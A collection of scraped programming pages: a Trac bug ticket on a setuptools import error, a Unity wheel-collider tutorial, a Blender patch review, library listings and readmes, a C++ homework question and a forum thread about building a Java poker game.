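    SIX = 6
    SEVEN = 7
    EIGHT = 8
    NINE = 9
    TEN = 10
    JACK = 11
    QUEEN = 12
    KING = 13

def new_deck():
    # One (rank, suit) pair per card: 13 * 4 = 52 in total.
    return [(rank, suit) for rank, suit in product(Rank, Suit)]

def deal(deck, n=5):
    # Shuffle, then pop n cards so the same card is never dealt twice.
    random.shuffle(deck)
    return [deck.pop() for _ in range(n)]
```

A function typed to accept a Suit can only meaningfully receive one of the four members, which is the type-safety point made above; with the int-constants version, any stray integer would slip through.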
http://www.coderanch.com/t/416602/Game-Development/java/Poker
CC-MAIN-2014-52
refinedweb
1,315
76.76
Angular has a powerful template engine that lets us easily manipulate the DOM structure of our elements. This guide looks at how Angular manipulates the DOM with structural directives and how you can write your own structural directives to do the same thing. Try the live example. What are structural directives? Structural directives are responsible for HTML layout. They shape or reshape the DOM’s structure, typically by adding, removing, or manipulating the host element and its descendants. Structural directives are easy to recognize. An asterisk (*) precedes the directive attribute name, as in this example. No brackets. No parentheses. Just *ngIf set to a string. You’ll learn in this guide that the asterisk (*) is a convenience notation and the string is a microsyntax rather than the usual template expression. Angular desugars this notation into a marked-up <template> that surrounds the host element and its descendants. Each structural directive does something different with that template. Three of the common, built-in structural directives — NgIf, NgFor, and NgSwitch... — are described in the Template Syntax guide and seen in samples throughout the Angular documentation. Here’s an example of them in a template: This guide won’t repeat how to use them. But it does explain how they work and how to write your own structural directive. Directive spelling Throughout this guide, you’ll see a directive spelled in both UpperCamelCase and lowerCamelCase. Already you’ve seen NgIf and ngIf. There’s a reason. NgIf refers to the directive class; ngIf refers to the directive’s attribute name. A directive class is spelled in UpperCamelCase (NgIf). A directive’s attribute name is spelled in lowerCamelCase (ngIf). The guide refers to the directive class when talking about its properties and what the directive does. The guide refers to the attribute name when describing how you apply the directive to an element in the HTML template. There are two other kinds of Angular directives, described extensively elsewhere: (1) components and (2) attribute directives. 
A component manages a region of HTML in the manner of a native HTML element. Technically it’s a directive with a template. An attribute directive changes the appearance or behavior of an element, component, or another directive. For example, the built-in NgStyle directive changes several element styles at the same time. You can apply many attribute directives to one host element. You can only apply one structural directive to a host element. NgIf case study NgIf is the simplest structural directive and the easiest to understand. It takes a boolean expression and makes an entire chunk of the DOM appear or disappear. The ngIf directive doesn’t hide elements with CSS. It adds and removes them physically from the DOM. Confirm that fact using browser developer tools to inspect the DOM. The top paragraph is in the DOM. The bottom, disused paragraph is not; in its place is a comment about “template bindings” (more about that later). When the condition is false, NgIf removes its host element from the DOM, detaches it from DOM events (the attachments that it made), detaches the component from Angular change detection, and destroys it. The component and DOM nodes can be garbage-collected and free up memory. Why remove rather than hide? A directive could hide the unwanted paragraph instead by setting its display style to none. While invisible, the element remains in the DOM. The difference between hiding and removing doesn’t matter for a simple paragraph. It does matter when the host element is attached to a resource intensive component. Such a component’s behavior continues even when hidden. The component stays attached to its DOM element. It keeps listening to events. Angular keeps checking for changes that could affect data bindings. Whatever the component was doing, it keeps doing. Although invisible, the component—and all of its descendant components—tie up resources. 
The performance and memory burden can be substantial, responsiveness can degrade, and the user sees nothing. On the positive side, showing the element again is quick. The component’s previous state is preserved and ready to display. The component doesn’t re-initialize—an operation that could be expensive. So hiding and showing is sometimes the right thing to do. But in the absence of a compelling reason to keep them around, your preference should be to remove DOM elements that the user can’t see and recover the unused resources with a structural directive like NgIf. These same considerations apply to every structural directive, whether built-in or custom. Before applying a structural directive, you might want to pause for a moment to consider the consequences of adding and removing elements and of creating and destroying components. The asterisk (*) prefix Surely you noticed the asterisk (*) prefix to the directive name and wondered why it is necessary and what it does. Here is *ngIf displaying the hero’s name if hero exists. The asterisk is “syntactic sugar” for something a bit more complicated. Internally, Angular desugars it in two stages. First, it translates the *ngIf="..." into a template attribute, template="ngIf ...", like this. Then it translates the template attribute into a template element, wrapped around the host element, like this. - The *ngIf directive moved to the <template> element where it became a property binding, [ngIf]. - The rest of the <div>, including its class attribute, moved inside the <template> element. None of these forms are actually rendered. Only the finished product ends up in the DOM. Angular consumed the <template> content during its actual rendering and replaced the <template> with a diagnostic comment. The NgFor and NgSwitch... directives follow the same pattern. 
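The markup samples this passage points at ("like this") were lost in extraction. As a rough reconstruction of the two desugaring stages it describes, assuming a hypothetical hero div with a class attribute:

```html
<!-- 1. What you write -->
<div *ngIf="hero != null" class="name">{{hero.name}}</div>

<!-- 2. Desugared into a template attribute on the host element -->
<div template="ngIf hero != null" class="name">{{hero.name}}</div>

<!-- 3. Desugared into a <template> element wrapped around the host:
     *ngIf becomes the [ngIf] property binding, and the <div> with its
     class attribute moves inside the <template> -->
<template [ngIf]="hero != null">
  <div class="name">{{hero.name}}</div>
</template>
```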
Inside *ngFor Angular transforms the *ngFor in similar fashion from asterisk (*) syntax through template attribute to template element. Here’s a full-featured application of NgFor, written all three ways: This is manifestly more complicated than ngIf and rightly so. The NgFor directive has more features, both required and optional, than the NgIf shown in this guide. At minimum NgFor needs a looping variable (let hero) and a list (heroes). You enable these features in the string assigned to ngFor, which you write in Angular’s microsyntax. Everything outside the ngFor string stays with the host element (the <div>) as it moves inside the <template>. In this example, the [ngClass]="odd" stays on the <div>. Microsyntax The Angular microsyntax lets you configure a directive in a compact, friendly string. The microsyntax parser translates that string into attributes on the <template>: The let keyword declares a template input variable that you reference within the template. The input variables in this example are hero, i, and odd. The parser translates let hero, let i, and let odd into variables named let-hero, let-i, and let-odd. The microsyntax parser takes of and trackBy, title-cases them (of -> Of, trackBy -> TrackBy), and prefixes them with the directive’s attribute name (ngFor), yielding the names ngForOf and ngForTrackBy. Those are the names of two NgFor input properties. That’s how the directive learns that the list is heroes and the track-by function is trackById. As the NgFor directive loops through the list, it sets and resets properties of its own context object. These properties include index and odd and a special property named $implicit. The let-i and let-odd variables were defined as let i=index and let odd=odd. Angular sets them to the current value of the context’s index and odd properties. The context property for let-hero wasn’t specified. Its intended source is implicit. 
Angular sets let-hero to the value of the context’s $implicit property, which NgFor has initialized with the hero for the current iteration. The API guide describes additional NgFor directive properties and context properties. These microsyntax mechanisms are available to you when you write your own structural directives. Studying the source code for NgIf and NgFor is a great way to learn more. Template input variable A template input variable is a variable whose value you can reference within a single instance of the template. There are several such variables in this example: hero, i, and odd. All are preceded by the keyword let. A template input variable is not the same as a template reference variable, neither semantically nor syntactically. You declare a template input variable using the let keyword (let hero). The variable’s scope is limited to a single instance of the repeated template. You can use the same variable name again in the definition of other structural directives. You declare a template reference variable by prefixing the variable name with # (#var). A reference variable refers to its attached element, component or directive. It can be accessed anywhere in the entire template. Template input and reference variable names have their own namespaces. The hero in let hero is never the same variable as the hero declared as #hero. One structural directive per host element Someday you’ll want to repeat a block of HTML but only when a particular condition is true. You’ll try to put both an *ngFor and an *ngIf on the same host element. Angular won’t let you. You may apply only one structural directive to an element. The reason is simplicity. Structural directives can do complex things with the host element and its descendants. When two directives lay claim to the same host element, which one takes precedence? Which should go first, the NgIf or the NgFor? 
Can the NgIf cancel the effect of the NgFor? If so (and it seems like it should be so), how should Angular generalize the ability to cancel for other structural directives? There are no easy answers to these questions. Prohibiting multiple structural directives makes them moot. There’s an easy solution for this use case: put the *ngIf on a container element that wraps the *ngFor element. One or both elements can be a <template> so you don’t have to introduce extra levels of HTML. Inside NgSwitch directives The Angular NgSwitch is actually a set of cooperating directives: NgSwitch, NgSwitchCase, and NgSwitchDefault. Here’s an example. You might come across an NgSwitchWhen directive in older code. That is the deprecated name for NgSwitchCase. The switch value assigned to NgSwitch (hero.emotion) determines which (if any) of the switch cases are displayed. NgSwitch itself is not a structural directive. It’s an attribute directive that controls the behavior of the other two switch directives. That’s why you write [ngSwitch], never *ngSwitch. NgSwitchCase and NgSwitchDefault are structural directives. You attach them to elements using the asterisk (*) prefix notation. An NgSwitchCase displays its host element when its value matches the switch value. The NgSwitchDefault displays its host element when no sibling NgSwitchCase matches the switch value. The element to which you apply a directive is its host element. The <happy-hero> is the host element for the happy *ngSwitchCase. The <unknown-hero> is the host element for the *ngSwitchDefault. As with other structural directives, the NgSwitchCase and NgSwitchDefault can be desugared into the template attribute form. That, in turn, can be desugared into the <template> element form. Prefer the asterisk (*) syntax The asterisk (*) syntax is more clear than the other desugared forms. 
While there’s rarely a good reason to apply a structural directive in template attribute or element form, it’s still important to know that Angular creates a <template> and to understand how it works. You’ll refer to the <template> when you write your own structural directive. The template element The HTML 5 <template> is a formula for rendering HTML. It is never displayed directly. In fact, before rendering the view, Angular replaces the <template> and its contents with a comment. If there is no structural directive and you merely wrap some elements in a <template>, those elements disappear. That’s the fate of the middle “Hip!” in the phrase “Hip! Hip! Hooray!”. Angular erases the middle “Hip!”, leaving the cheer a bit less enthusiastic. A structural directive puts a <template> to work as you’ll see when you write your own structural directive. Group sibling elements There’s often a root element that can and should host the structural directive. The list element (<li>) is a typical host element of an NgFor repeater. When there isn’t a host element, you can usually wrap the content in a native HTML container element, such as a <div>, and attach the directive to that wrapper. Introducing another container element—typically a <span> or <div>—to group the elements under a single root is usually harmless. Usually … but not always. The grouping element may break the template appearance because CSS styles neither expect nor accommodate the new layout. For example, suppose you have the following paragraph layout. You also have a CSS style rule that happens to apply to a <span> within a <p>aragraph. The constructed paragraph renders strangely. The p span style, intended for use elsewhere, was inadvertently applied here. Another problem: some HTML elements require all immediate children to be of a specific type. For example, the <select> element requires <option> children. 
You can’t wrap the options in a conditional <div> or a <span>. When you try this, the drop down is empty. The browser won’t display an <option> within a <span>. template to the rescue The Angular <template> is a grouping element that doesn’t interfere with styles or layout because Angular doesn’t put it in the DOM. Here’s the conditional paragraph again, this time using <template>. It renders properly. Notice the use of a desugared form of NgIf. Now conditionally exclude a select <option> with <template>. The drop down works properly. The <template> is a syntax element recognized by the Angular parser. It’s not a directive, component, class, or interface. It’s more like the curly braces in a Dart if-block: Without those braces, Dart would only execute the first statement when you intend to conditionally execute all of them as a single block. The <template> satisfies a similar need in Angular templates. Write a structural directive In this section, you write an UnlessDirective structural directive that does the opposite of NgIf. NgIf displays the template content when the condition is true. UnlessDirective displays the content when the condition is false. Creating a directive is similar to creating a component. Here’s how you might begin: lib/src/unless_directive.dart (skeleton) The directive’s selector is typically the directive’s attribute name in square brackets, [myUnless]. The brackets define a CSS attribute selector. The directive attribute name should be spelled in lowerCamelCase and begin with a prefix. Don’t use ng. That prefix belongs to Angular. Pick something short that fits you or your company. In this example, the prefix is my. The directive class name ends in Directive. Angular’s own directives do not. 
TemplateRef and ViewContainerRef A simple structural directive like this one creates an embedded view from the Angular-generated <template> and inserts that view in a view container adjacent to the directive’s original <p> host element. You’ll acquire the <template> contents with a TemplateRef and access the view container through a ViewContainerRef. You inject both in the directive constructor as private variables of the class. The myUnless property The directive consumer expects to bind a true/false condition to [myUnless]. That means the directive needs a myUnless property, decorated with @Input. Read about @Input in the Template Syntax guide. Angular sets the myUnless property whenever the value of the condition changes. Because the myUnless property does work, it needs a setter. If the condition is false and the view hasn’t been created previously, tell the view container to create the embedded view from the template. If the condition is true and the view is currently displayed, clear the container, which also destroys the view. Nobody reads the myUnless property so it doesn’t need a getter. The completed directive code looks like this: lib/src/unless_directive.dart (excerpt) Add this directive to the directives list of the AppComponent. Then create some HTML to try it. When the condition is false, the top (A) paragraph appears and the bottom (B) paragraph disappears. When the condition is true, the top (A) paragraph is removed and the bottom (B) paragraph appears. Summary You can both try and download the source code for this guide in the live example. Here is the source under the lib folder. You learned - that structural directives manipulate HTML layout. - to use <template> as a grouping element when there is no suitable host element. - that Angular desugars the asterisk (*) syntax into a <template>. - how that works for the NgIf, NgFor, and NgSwitch built-in directives. 
- about the microsyntax that expands into a <template>. - to write a custom structural directive, UnlessDirective.
https://webdev.dartlang.org/angular/guide/structural-directives
CC-MAIN-2018-26
refinedweb
2,787
58.69
Is it possible to launch a launch file from Python? Final update: The solution so far is modified from here, with help from ufr3c_tjc. (Thank you loudly in my heart.) The original code from the link above is erroneous and won't work. The main part remains: class open_launch_file(): def __init__(self): rospy.init_node('tester', anonymous=True) rospy.on_shutdown(self.shutdown) uuid = roslaunch.rlutil.get_or_generate_uuid(None, False) roslaunch.configure_logging(uuid) launch = roslaunch.parent.ROSLaunchParent(uuid,["/path/to/your/launch/file"]) launch.start() def shutdown(self): rospy.loginfo("Stopping the robot...") destroy() # my own cleanup function; you don't have to have it, but if there is anything you need to do before closing the ROS node, do it here. rospy.sleep(1) =============================================================================== I have a .launch file that basically just opens the webcam, and I would like to call it from my Python code when needed. I searched online and found something like this: I have tested other normal commands like "ls -l" and "echo Hello world", and they work fine. However, it would not work with the launch file: import subprocess p = subprocess.Popen(["roslaunch ~/path/to/cam.launch "],stdout=subprocess.PIPE,stderr = subprocess.PIPE,shell=True) print p.communicate() The error message is: '/bin/sh: 1: roslaunch: not found\n I am using Python 2.7. update: the output of printenv | grep PY is: INSIDE_CAJA_PYTHON= PYTHONPATH=/opt/ros/kinetic/lib/python2.7/dist-packages When using the API example provided by ROS, there were errors that confused me. I have set the environment correctly, I believe. When I rosrun tester_pkg tester.py, it gives the error NameError: name 'rospy' is not defined. So I tried sudo python tester.py directly; it gives ImportError: No module named roslaunch. Thank you all for replying. I am new to ROS and really need some help. 
updated code: tester.py #!/usr/bin/env python import roslaunch import rospy rospy.init_node('tester', anonymous=True) rospy.on_shutdown(self.shutdown) uuid = roslaunch.rlutil.get_or_generate_uuid(None, False) roslaunch.configure_logging(uuid) launch = roslaunch.parent.ROSLaunchParent(uuid,["/home/yue/catkin_ws/src/webcam_car/launch/cam.launch"]) launch.start() launch.shutdown() Don't use sudo. That will run it as root, which will never work unless ROS is installed as root. line 3: syntax error near unexpected token is telling you the issue. Look at line 3 of the file and see what could be wrong (or post the file for us to see). NameError: name 'rospy' is not defined Add import rospy Thank you! But now the error becomes... the line 3 error is fixed by adding #!/usr/bin/env python. A stupid omission. Can you edit the question with the file's code you are trying to run? That will make it much easier to help you. Sure. It's basically sample II from the roslaunch API page. The self.shutdown part is weird. The self keyword is only used in a class context. Just remove that line completely. Also, this script will immediately start and then shut down the launch file, so maybe just remove the launch.shutdown() part until you decide how/when you want to shut it down. I found a comment about the self.shutdown: # Set rospy to execute a shutdown function when terminating the script Remove this line and the launch.shutdown(), and it works; I can see the process being created! But the launch file still shuts itself down. I guess I can take over from here now! Thank you so much
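The '/bin/sh: 1: roslaunch: not found' error in the question is an environment problem: the shell that Popen spawns has not sourced the ROS setup script, and /bin/sh (dash on Ubuntu) does not even support the `source` builtin. A hedged sketch of the subprocess route follows; the /opt/ros/kinetic path is an assumption matching the PYTHONPATH shown above, so adjust it to your install.

```python
import subprocess

def run_in_env(command, setup="source /opt/ros/kinetic/setup.bash"):
    """Run a shell command after sourcing an environment setup script.

    executable="/bin/bash" matters: plain /bin/sh lacks `source`.
    The default setup path is an assumption; adjust it to your install.
    """
    full = "{0} && {1}".format(setup, command)
    return subprocess.Popen(full, shell=True, executable="/bin/bash",
                            stdout=subprocess.PIPE, stderr=subprocess.PIPE)

# e.g. run_in_env("roslaunch /path/to/cam.launch")
```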
https://answers.ros.org/question/263862/if-it-possible-to-launch-a-launch-file-from-python/?sort=oldest
CC-MAIN-2021-49
refinedweb
574
70.7
." edit The Beginning The term "Making Up Oscar Wilde Quotes" was coined by User:TheTris in an article posted at precisely 10:19, 7 March 2005: - It is easy to find Oscar Wilde quotes, largely due to the national sport of England, which is "Making Up Oscar Wilde Quotes". Indeed, "It's a sorry man who can not invent an Oscar Wilde quote to fit his situation" ~Oscar Wilde The article was Oscar Wilde, and the subject, Oscar Wilde, was destined to become known as the "Founder of Uncyclopedia." (No one knows why.) Only one day later, at 19:06 on 8 March 2005, User:129.44.34.173 posted this article, entitled Making up Oscar Wilde quotes: - "Making Up Oscar Wilde quotes is the noblest of all the arts" ~ Oscar Wilde - "A man who can not invent an Oscar Wilde quote is no man at all" ~ Oscar Wilde - Widely regarded as the best spectator sport ever invented, other than Sudden Death Twister. - "If you really think I said this, you're dumber than you look" ~ Oscar Wilde Amazingly, the link to "Sudden Death Twister," a three-line stub article posted by User:PantsMacKenzie which has been deleted at least once, has remained in place through over 1,200 edits. edit The Middle Once in place, these two articles ultimately became one of the most heavily read, edited, and vandalized articles in early Uncyclopedia history. (Again, no one knows why.) Other articles soon sprang up quoting other famous personages. Some of those articles thrived, while others withered and died.. edit Founding of Unquotable. edit Great Unquotable Cleanup of 2013 Activity in Unquotable declined after the initial burst of editing 2006, and the namespace laid mostly dormant for several years. Experienced writers eventually realized that pages of quotes were not funny. Although articles would get an occasional quote, bot edit, or even deletion, Unquotable was largely ignored until 2013. On February 17th, 2013, Mnbvcxz decided to nominate Unquotable:Charles Darwin for deletion. 
Some discussion arose over whether Unquotable even needed its own namespace, as there were only about 40 real articles in the namespace. The community ultimately decided against deleting the entire project. However, the discussion resulted in the Great Unquotable Cleanup of 2013. During the Great Unquotable Cleanup of 2013, almost all the Unquotable pages were purged of bad quotes, often reducing article length by half or more. Additionally, several Unquotable pages were deleted or merged in the process of cleaning up Quotespace. Interestingly, very little, if any, new material was added to Unquotable during the cleanup.

See Also

1. For several weeks, the space was actually referred to as "QuoteUnquote." (No one knows why.)
http://uncyclopedia.wikia.com/wiki/Unquotable:History_of_Unquotable
In Python: it uses a lazy array with the sums of the consecutive elements, so that for the sorted-array case we can search for the target.

A solution in Java (the search loop is completed here, since only the setup survived):

public class Main {
    public static void main(String args[]) {
        int target = 100;
        int[] numeros = {5, 26, 39, 47, 53, 38, 12, 23, 41, 39, 40, 16, 47, 13, 10, 18, 4, 22, 50};
        int result = -1;
        for (int i = 0; i < numeros.length - 1; i++) {
            if (numeros[i] + numeros[i + 1] == target) {
                result = i;
                break;
            }
        }
        System.out.println(result);
    }
}

Here's a solution in C. The program takes a target value, followed by a u or s (to indicate sorted or unsorted), followed by an array of ints. The printed output shows the index of the first element of the pair of adjacent elements that sum to the specified target. If there is no such pair, the program prints -1. Example usage:
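The Python solution referenced above is not shown; here is a hypothetical linear-scan sketch of the same exercise (it handles both the sorted and unsorted cases, though it skips the lazy prefix-sum trick the commenter describes):

```python
# Find the index of the first element of a pair of adjacent elements
# that sum to the target; return -1 if no such pair exists.
def adjacent_pair_index(values, target):
    for i in range(len(values) - 1):
        if values[i] + values[i + 1] == target:
            return i
    return -1

numeros = [5, 26, 39, 47, 53, 38, 12, 23, 41, 39, 40, 16, 47, 13, 10, 18, 4, 22, 50]
print(adjacent_pair_index(numeros, 100))  # prints 3 (47 + 53 at indices 3 and 4)
```

For the sorted case a binary search over the array of adjacent-pair sums would be faster, but the linear scan above works either way.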
https://programmingpraxis.com/2020/01/10/consecutive-array-search/
Opened 7 years ago Closed 7 years ago

#12755 closed (wontfix)

Proposal: Add a method to ModelAdmin to return the form instance

Description

Sometimes we need dynamic fields in a form, depending on the logged-in user or something else. Currently the ModelAdmin class has a get_form() method that returns a form class to be used in the admin. But it would be nice to customize the form instantiation when we are building dynamic forms. I've attached a patch that adds a get_form_instance() method to ModelAdmin, and it receives the request object. This way we can pass extra parameters to our dynamic form based on some request attributes. For example:

def get_form_instance(self, request, form_class, **kwargs):
    return form_class(user=request.user, **kwargs)

I don't think it breaks backwards compatibility and it's not a new feature, so probably could be added to 1.2.

Attachments (1)

Change History (4)

Changed 7 years ago by igors

comment:1 Changed 7 years ago by igors

- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset

Actually it's not needed, not for this example. I could just use functools.partial() in get_form(), like:

def get_form(self, request, obj=None, **kwargs):
    form_class = super(MyModelAdmin, self).get_form(request, obj=obj, **kwargs)
    return functools.partial(form_class, user=request.user)

comment:2 Changed 7 years ago by ubernostrum

- milestone 1.2 deleted

This is a feature request, and the feature proposal period for 1.2 is over. If this ever happens (and I for one wouldn't bet on it), it'll be after 1.2.

comment:3 Changed 7 years ago by Alex

- Resolution set to wontfix
- Status changed from new to closed

Igors has pointed out this isn't necessary.

Add get_form_instance() method to ModelAdmin
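The functools.partial trick in comment 1 is not Django-specific; here is a framework-free sketch of the same pattern (MyForm, get_form, and the user value are illustrative stand-ins, not Django API):

```python
import functools

# A stand-in "form class": callers normally construct it with just `data`.
class MyForm:
    def __init__(self, data=None, user=None):
        self.data = data
        self.user = user

# Analogous in spirit to ModelAdmin.get_form() returning a partial:
# the extra `user` kwarg is bound in, so downstream code can keep
# instantiating the result exactly like a plain form class.
def get_form(user):
    return functools.partial(MyForm, user=user)

form_class = get_form("alice")
form = form_class(data={"name": "x"})
print(form.user)  # alice
```

The caller never learns that the class was curried, which is why the ticket was closed as unnecessary.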
https://code.djangoproject.com/ticket/12755
How to use C# FileStream Class

The FileStream class represents a file in the computer. Use the FileStream class to read from, write to, open, and close files on a file system, as well as to manipulate other file-related operating system handles, including pipes, standard input, and standard output. FileStream allows you to move data to and from the stream as arrays of bytes.

We operate on a file using a FileMode in the FileStream class. Some FileModes are as follows:

FileMode.Create : Creates a new file; if the file already exists, its contents are overwritten.
FileMode.CreateNew : Creates a new file; if the file already exists, it throws an exception.
FileMode.Open : Opens an existing file.

How to create a file using the C# FileStream class?

The following C# example shows how to create and write to a file using FileStream.

using System;
using System.Windows.Forms;
using System.IO;
using System.Text;

namespace WindowsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void button1_Click(object sender, EventArgs e)
        {
            try
            {
                // FileMode.Append creates the file if it does not exist,
                // otherwise it appends to the existing contents.
                byte[] byteData = Encoding.ASCII.GetBytes("FileStream Test");
                FileStream wFile = new FileStream("c:\\streamtest.txt", FileMode.Append);
                wFile.Write(byteData, 0, byteData.Length);
                wFile.Close();
            }
            catch (IOException ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }
    }
}

When we execute the above C# source code, it creates the file if necessary and appends the content at the specified path.

- How to use C# Directory Class
- How to use C# File
http://csharp.net-informations.com/file/csharp-filestream-class.htm
You don't have permission to open (or write?) whatever file you are trying to work with. Try running the script as super user or change permissions on the directory where you are trying to read/write.

You could use the cwd parameter, to run scriptB in its directory:

import os
from subprocess import check_call

check_call([scriptB], cwd=os.path.dirname(scriptB))

The error means that the program is found by subprocess but the user running "nessusscan.py" does not have permission to run it. Check ownership of the nessus file and the permissions on it.

The child process flushes its output buffers on exit, but the prints from the parent are still in the parent's buffer. The solution is to flush the parent's buffers before running the child:

print("Starting script...")
sys.stdout.flush()
build.run()

Okay, after days I found the solution myself. Due to misconfiguration, my rails app was not running as the www-data user. For testing purposes I added the ssh-key of the user which actually runs the script to my bitbucket repository and it worked.

In script1.py place this:

def main():
    # do something
    ...

if __name__ == "__main__":
    main()

In script2.py:

import script1

if condition:
    script1.main()

"I know I have to do some kind of root thing?" Indeed you do! If you are using linux, sudo is the idiomatic way to escalate your user's privilege. So instead invoke 'sudo dd if=/dev/sdb of=/dev/null' (for example). If your script must be noninteractive, consider adding something like

admin ALL = NOPASSWD: ALL

to your sudoers, or something similar.

It seems like the ftp server allows anonymous access; you don't need to pass a username and password. The FTP constructor accepts a hostname (or IP), not a URL.
import sys
import os
from ftplib import FTP

ftp = FTP("ftpsite.com")
ftp.login()
ftp.cwd("/ftp/site/directory/")
listing = []
ftp.retrlines("LIST", listing.append)
words = listing[0].split(None, 8)
filesize = int(words[4])
filename = words[-1].lstrip()

class VerboseWriter:
    def __init__(self, lf, filesize):
        self.progress = 0
        self.lf = lf
        self.filesize = filesize

    def write(self, data):
        self.lf.write(data)
        self.progress += len(data)
        sys.stdout.write(' {}/{} ({:.1%})'.format(self.progress, self.filesize, float(self.progress)/self.filesize))
        sys.stdout.flush()

# download the file with the verbose writer

Try changing the port to 8080. You didn't say which OS, but most UNIX derivatives will only allow root to listen on ports below 1,024 or 4,096, depending on the OS and its configuration.

To answer your first question: yes, if the file is not there Python will create it. Secondly, the user (yourself) running the python script doesn't have write privileges to create a file in the directory.

print os.path.dirname(sys.executable) is what you should use. When you click it it is probably running through python.exe so you are removing the extra char from the w..
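The VerboseWriter pattern in the FTP answer can be exercised without a network connection. This hedged sketch feeds chunks to an in-memory buffer the way ftplib's retrbinary would feed them to .write(); the names and chunk data are illustrative:

```python
import io
import sys

# Wraps a destination file object and reports cumulative progress
# against a known total size on each write() call.
class ProgressWriter:
    def __init__(self, out, total):
        self.out = out
        self.total = total
        self.progress = 0

    def write(self, data):
        self.out.write(data)
        self.progress += len(data)
        sys.stdout.write("\r {}/{} ({:.1%})".format(
            self.progress, self.total, self.progress / self.total))
        sys.stdout.flush()

buf = io.BytesIO()
w = ProgressWriter(buf, 10)
for chunk in (b"hello", b"world"):  # stand-in for FTP data chunks
    w.write(chunk)
print()
print(buf.getvalue())  # b'helloworld'
```

With a real transfer you would pass w.write as the callback, e.g. ftp.retrbinary("RETR " + filename, w.write).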
http://www.w3hello.com/questions/When-attempting-run-a-python-script-from-within-another-python-script-I-get-39-permission-denied-39-
Hi folks, Just resub'd after a long time to ask a question about binary/backwards compatibility. We got bitten when upgrading from 3.0.0 to 3.0.3, which we assumed would be binary compatible, and so (after some testing to confirm it was) replaced our existing 3.0.0 install with the 3.0.3 one (because we're using hierarchical namespaces in Lmod, it meant we avoided needing to recompile everything we'd already built over the last 12 months with 3.0.0). However, once we'd done that we heard from a user that their code would no longer run because it couldn't find libopen-pal.so.40, and saw that 3.0.3 instead had libopen-pal.so.42. Initially we thought this was some odd build system problem, but then on digging further we realised that they were linking against libraries that were in turn built against OpenMPI (HDF5), and that those had embedded the libopen-pal.so.40 names. Of course our testing hadn't found that because we weren't linking against anything like those for our MPI tests. :-( But I was really surprised to see that these version numbers were changing; I thought the idea was to keep things backwardly compatible within these series? Now fortunately our reason for doing the forced upgrade (we found our 3.0.0 didn't work with our upgrade to Slurm 18.08.3) turned out to be one combination we'd missed in our testing whilst fault-finding, and having gotten it going we've been able to drop back to the original 3.0.0 and fix it for them. But is this something that you folks have come across before? All the best, Chris -- Christopher Samuel OzGrav Senior Data Science Support ARC Centre of Excellence for Gravitational Wave Discovery _______________________________________________ devel mailing list devel@lists.open-mpi.org
https://www.mail-archive.com/devel@lists.open-mpi.org/msg20818.html
Hello folks, today I decided to update my 0.6something to CVS. The first thing I found was a bug ;-) The PSP Servlet engine writes a temp file in /tmp and later os.rename()s it to the actual servlet file. If /tmp and Webware are not on the same file system, this will fail. Of course I have no idea how long the bug has already been there. The single-line fix below provides a quick solution. Finding a perhaps more appropriate temp dir may be up to Chuck or Geoff or whoever maintains PSP. The diff is also attached. Thanks, Fionn

--------8<----------------8<---------------8<---------------8<-------

*** ServletWriter.py.orig Thu Feb 7 18:46:53 2002
--- ServletWriter.py Thu Feb 7 19:00:25 2002
***************
*** 33,52 ****
--- 33,53 ----
  ''' This file creates the servlet source code. Well, it writes it out to a file at least.'''
  TAB = '\t'
  SPACES = '    ' # 4 spaces
  EMPTY_STRING=''
  def __init__(self,ctxt):
      self._pyfilename = ctxt.getPythonFileName()
+     tempfile.tempdir = os.path.dirname(self._pyfilename)
      self._temp = tempfile.mktemp('tmp')
      self._filehandle = open(self._temp,'w+')
      self._tabcnt = 0
      self._blockcount = 0 # a hack to handle nested blocks of python code
      self._indentSpaces = self.SPACES
      self._useTabs=1
      self._useBraces=0
      self._indent='\t'
      self._userIndent = self.EMPTY_STRING
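The cross-filesystem rename pitfall described in this report applies to any code that creates a temp file in one directory and renames it into another. A minimal standalone sketch of the fix (same-directory temp file plus an atomic rename; the file name and contents are illustrative):

```python
import os
import tempfile

def write_atomically(path, data):
    # Create the temp file in the destination's own directory, so the
    # final rename never crosses a file-system boundary (no EXDEV error).
    directory = os.path.dirname(os.path.abspath(path))
    fd, tmp_path = tempfile.mkstemp(dir=directory)
    try:
        with os.fdopen(fd, "w") as f:
            f.write(data)
        # os.replace() atomically overwrites the destination on the
        # same filesystem.
        os.replace(tmp_path, path)
    except BaseException:
        os.remove(tmp_path)
        raise

target = os.path.join(tempfile.mkdtemp(), "servlet.py")
write_atomically(target, "# generated servlet code\n")
print(open(target).read())
```

Modern code would use os.replace() rather than os.rename() on Windows, but the key point is the same as in the patch: the temp directory must live on the destination's filesystem.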
http://sourceforge.net/mailarchive/message.php?msg_id=3314268
Overview

This example shows how to load a hip file from a Python shell and inspect its contents. It loops through all the objects in /obj and prints out the positions of each of the points in each object.

Implementation

hou.hipFile.load("file_to_load.hip")
for object in hou.node("/obj").children():
    print "Points in", object.path()
    for point in object.displayNode().geometry().points():
        print point.position()
    print

Running outside of Houdini

You can run this example outside of Houdini or Hython (that is, in a standard Python environment) if you first add hou to the Python path and import it (note that this will still use a Houdini license).

import sys, os

# Adjust sys.path so it contains $HFS/houdini/pythonX.Xlibs. Then we can
# safely import the hou module. Importing this module will bring a Houdini
# session into the Python interpreter.
sys.path.append(
    os.environ['HFS'] + "/houdini/python%d.%dlibs" % sys.version_info[:2]
)
import hou

If you want to use hou as part of a larger general Python application, and you want to take up a license for the minimum time possible, you can release the license when you're done with it using hou.releaseLicense():

# Release the Houdini Batch license. If this script accesses the hou
# module again it will reacquire the license automatically.
hou.releaseLicense()
http://www.sidefx.com/docs/houdini/hom/cb/hipfile.html
This section provides an example, with code, for renaming a column in a database table. As we know, each table keeps its contents in row-and-column format. When we create a table we specify the name of each column we want to add, but later we may need to change the name of a particular column. A brief description of the program is given below:

Description of program: First this program establishes a connection with the database using the JDBC driver. After establishing the connection we give the table name, the old column name that we want to rename, the new column name, and its data type. After that you will see that the column has been renamed. If the column is renamed successfully, the message displayed is "Query OK, n rows affected"; if there is any problem in the SQL statement, it shows "Wrong entry!".

Description of code:

ALTER TABLE table_name CHANGE old_col new_col data_type: This query is issued to change a specific column name. It takes the following arguments:

table_name: The name of the table in which we have to change the column name.
old_col: The old column name that you want to change.
new_col: The new column name.
data_type: The data type of the new column.
Here is the code of the program (the driver name, connection URL, and credentials are placeholders; substitute your own):

import java.io.*;
import java.sql.*;

public class ChangeColumnName{
  public static void main(String[] args) {
